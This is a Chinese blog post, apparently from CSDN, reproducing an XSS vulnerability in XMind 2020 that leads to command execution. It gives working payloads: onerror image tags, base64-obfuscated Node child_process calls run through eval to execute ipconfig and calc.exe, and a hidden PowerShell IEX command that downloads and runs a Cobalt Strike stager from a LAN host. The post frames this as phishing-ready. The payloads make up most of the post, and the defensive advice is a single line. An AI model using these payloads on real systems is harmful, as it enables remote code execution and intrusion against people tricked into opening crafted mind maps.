XMind 2020 XSS漏洞复现

最新推荐文章于 2024-03-06 09:48:31 发布
最新推荐文章于 2024-03-06 09:48:31 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: 复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54648419/article/details/117248212
版权

一.前言

漏洞危害:可以花样构造相关参数,执行系统命令,获取用户权限,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害,我看网上相关复现文章都贴着这句话,其实也就是这样的,XMind xss漏洞的确可以被利用执行一些像弹窗,执行命令(经典ipconfig命令,弹计算器),以及配合cs的使用,如果真的有有心人去利用这个漏洞的话,也是很容易中招的。下面放上下载地址。

在这里插入图片描述

下载地址下载XMind 2020版本

二.漏洞利用

1.xss弹窗
  1. 创建
    在这里插入图片描述
  2. 写入命令
    在思维导图红色部分(不止红色部分,后面的分支主题1,2,3都可以)
    在这里插入图片描述
<img src=x onerror=alert("qwer")>

<audio src=x onerror=alert("qwer")>

好像只有这类标签的弹窗才行,其余还是有被过滤的
3. 执行

在大纲中选中命令,按任意一个功能键(如:Ctrl,Alt,Ctrl+C等等)

在这里插入图片描述在这里插入图片描述

必须选中最后的>符号,其余的可选可不选。

2.命令执行
(1)ipconfig

利用命令:

const tenet = require('child_process')tenet.exec('ipconfig /all',(error, stdout, stderr)=>{alert(`stdout: ${stdout}`);});

整体语句:

<img src=x onerror='eval(new Buffer(const tenet = require('child_process')tenet.exec('ipconfig /all',(error, stdout, stderr)=>{alert(`stdout: ${stdout}`);});))'>

但是直接贴上去的话
在这里插入图片描述

还是稍有防护的,需要进行base64加密
在这里插入图片描述

emmmm,虽然编码有点问题,但还是能看到一些关键信息的,这里Buffer后网上都说要加一个空格否则会出错,其实出问题的话和这里应该是没关系的(Buffer起到绕过作用)。

(2)弹计算器

利用命令:

require('child_process').exec('calc.exe',(error, stdout, stderr)=>{alert(stdout: ${stdout});});

最终命令:

<img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>

在这里插入图片描述

3.结合cs

这里我一直连接不上可能是我连接的姿势还是有点问题,先把方法步骤丢到这里,以后发现问题了再回来更改吧

  1. 打开cs监听器

  1. powershell

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.__.__:8080/a'))"
  1. 利用语句:
const tenet = require('child_process')
tenet.exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.168.__.__:8080/a\'))"',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });

base64编码(有删掉的地方,不能复制了,这里要注意添加两个\,如图):

在这里插入图片描述

Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWMgIklFWCAoKG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWRzdHJpbmcoXCdodHRwOi8vMTkyLjE2OC42NC4xMzA6ODA4MC9hXCcpKSInLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0Z

最终语句:

<img src=x onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWMgIklFWCAoKG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWRzdHJpbmcoXCdodHRwOi8vMTkyLjE2OC42NC4xMzA6ODA4MC9hXCcpKSInLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0Z`,`base64`).toString())'>

在这里插入图片描述

执行后我还是没法上线(应该是我cs使用的问题),大家可以试一试。

三.防范

我选择不使用,如果必须得使用的话还是更新一下版本比较好,也不要随便接受别人发过来的XMind思维导图

Matat4
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
XMind漏洞xss复现(最全payload图文教程)
weixin_51387754的博客
05-18 376
https://mp.weixin.qq.com/s/gunmk1ox62sg2ifmVLFy7A
xmind漏洞
qq_23690313的博客
12-14 2662
XMind 目录 一、 项目概要 1 二、 测试过程 1 (一) 制定实施方案: 1 (二) 风险规避: 1 (三) 测试过程: 2 (四) 整改加固建议: 4 三、 渗透测试方法 5 (一) RCE漏洞 5 (二) Cobalt Strike 5 四、 渗透测试范围 6 一、项目概要 (一)项目背景:2021年5月10日,360漏洞云监测到Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。 (二)实验目标:主要通过渗透测试的方式,发现和总结
xmind2020xss漏洞复现
m0_46171781的博客
05-10 493
今天看到某数字漏洞平台公布的xmind漏洞,尝试复现一下 一、复现环境 使用软件为xmind2020版本,可以在xmind官网(https://www.xmind.cn/)进行下载 二、复现过程 1.创建一个思维导图,内容中写入payload 2.进入大纲选项,选中内容按功能键,如ctrl键 3.进一步利用漏洞(payload来自于https://mp.weixin.qq.com/s/NjrycY4TxEz_vV83prNBzw),成功弹出计算器 payload如下: <img src=x on
Xmind 2020 XSS漏洞导致命令执行漏洞复现
Jaky5320的博客
05-10 295
0x00简介:       XMind是一个挺不错的思维导图软件,某数字漏洞云公众号在今天2021-05-10 10:22:29发布了漏洞预警信息,我立马找复现环境。下载地址:https://www.xmind.cn/0x01:复现:环境:1、XSS复现2、命令执行漏洞复现:0x02:预防:       1、升级到最新版本    2、谨慎打开Xmind &nb
XSS 思维导图】漏洞概述、类型和区别
最新发布
吉吉的博客
03-06 405
XSS 相关的基础知识思维导图,与诸君共享!
XMind 2020 for mac app.asar文件
09-19
XMind 2020 for mac app.asar 文件详解】 XMind 2020 是一款广受欢迎的思维导图和头脑风暴软件,适用于多种操作系统,包括macOS。在这款软件的mac版本中,`app.asar` 文件是一个至关重要的组件,它包含了应用程序...
XMind_ZEN2020.zip
08-24
Xmind Zen 2020:思维导图软件的高效使用指南》 Xmind Zen 2020是一款强大的思维导图软件,专为Windows操作系统设计,支持32位和64位系统。该软件以其简洁的界面、丰富的功能和高效的操作体验,深受用户喜爱。在...
XMind2020_10.1.3.202005102342_Patch_Linux.zip
06-01
这款名为“XMind2020_10.1.3.202005102342_Patch_Linux.zip”的压缩包文件,专门针对Linux Deepin操作系统进行了优化,确保在该平台上能够顺利运行并提供良好的用户体验。 首先,让我们深入了解一下XMind的核心功能...
XMind_2020_64位
02-09
XMind_2020_64位】是一款专为64位操作系统设计的思维导图制作软件,它在行业内被广泛使用,是提升个人和团队效率的有效工具。XMind提供了一种可视化的方式来组织信息,帮助用户进行头脑风暴、项目规划、知识管理等...
[mac苹果电脑版]xmind 2020最新解锁说明.zip
05-12
在本压缩包中,我们关注的是“[mac苹果电脑版]xmind 2020最新解锁说明.zip”,这显然与XMind 2020的macOS版本有关,XMind是一款广泛使用的思维导图和头脑风暴软件。下面将详细讨论XMind 2020在macOS平台上的使用、...
sql,逻辑漏洞xss,反序列化思维导图
weixin_56239202的博客
04-18 261
基础漏洞系列(二)——XSS
柠檬木有枝
01-13 311
https://github.com/jlkl/Basic_vulnerability/blob/master/XSS%E8%84%91%E5%9B%BE_19_8.mindmap.xmind
xss思维导图
weixin_66993139的博客
11-29 317
XSS思维导图
u011975363的专栏
12-24 482
好记性不如烂笔头
xss脑图
memery_key的博客
06-24 245
安全思维导图
cnbird's blog
10-17 1243
http://www.amanhardikar.com/mindmaps.html
web安全学习笔记(四)——XSS学习思维导图
jokerhappy的博客
06-15 607
前行不易,勿忘初心。
XSS漏洞[OWASP TOP 7]
luqi5的博客
01-22 163
文章目录一、XSS漏洞[OWASP TOP 7]二、XSS攻击分类1.反射型XSS2.持久型XSS3.DOM XSS三、常见的防范方法四、漏洞危害 一、XSS漏洞[OWASP TOP 7] XSS攻击就是——攻击者往Web页面里插入恶意html标签或者javascript代码。 跨站脚本攻击(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私、钓鱼欺骗、窃取密码、传播恶意代码等攻击。 XSS攻击使用到的技术主要为HTML和Javascript,也包括VBScr
[笔记][小迪1-7]web安全
weixin_40731240的博客
01-20 3491
第一课 基础入门 - 名词概念 涉及知识 域名 什么是域名? 常见网址,如www.xiaodi8.com。 域名在那里注册?域名厂商,如godaddy 什么是二级域名多级域名?域名前后缀不同,如test.xiaodi8.com, test.xiaodi8.cn.com 域名发现对安全测试意义?主站无法探测出漏洞时,可以从旁站入手 DNS 什么是DNS?解析域名与IP地址的服务器 本地HOSTS与DNS的关系?本地HOSTS寻址优先级高于DNS CDN是什么?与DNS的关系?Content
xmind2020安装目录
09-16
XMind 2020的安装目录是用户选择安装XMind 2020时所指定的目录。在安装XMind 2020之前,用户需要下载安装程序,并运行该程序。运行程序后,用户将看到一个安装向导,该向导将引导用户完成XMind 2020的安装过程。 在...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值